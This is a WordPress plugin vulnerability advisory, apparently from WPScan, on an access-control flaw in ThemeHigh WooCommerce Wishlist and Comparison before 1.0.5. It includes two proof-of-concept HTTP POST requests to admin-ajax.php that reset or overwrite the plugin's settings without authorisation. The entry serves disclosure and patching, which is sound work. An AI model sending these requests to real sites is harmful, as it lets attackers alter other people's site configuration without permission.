WordPress Plugin Vulnerabilities
ThemeHigh WooCommerce Wishlist and Comparison < 1.0.5 - Unauthorised AJAX call
Description
Some AJAX actions did not have proper CSRF and authorisation checks, allowing unauthorised call either via unauthenticated/low privilege users or CSRF, which could allow attackers to reset or change the settings of the plugin for example
Proof of Concept
Reset arbitrary option in the plugin (v < 1.0.5) POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Content-Length: 46 Connection: close action=reset_to_default&reset=general_settings Save General Settings (v < 1.0.3) POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Content-Length: 163 Connection: close action=save_general_settings&wishlist_page=&ajax_loading=false&require_login=false&wishlnk_myaccont=false&remove_pdct=true&chckut_redrct=false&success_notice=false Other actions were possible
Affects Plugins
Fixed in 1.0.5 Classification
Type
ACCESS CONTROLS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
WPScanTeam
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-05-08 (about 3 years ago)
Added
2021-05-08 (about 3 years ago)
Last Updated
2021-05-08 (about 3 years ago)
WPScan 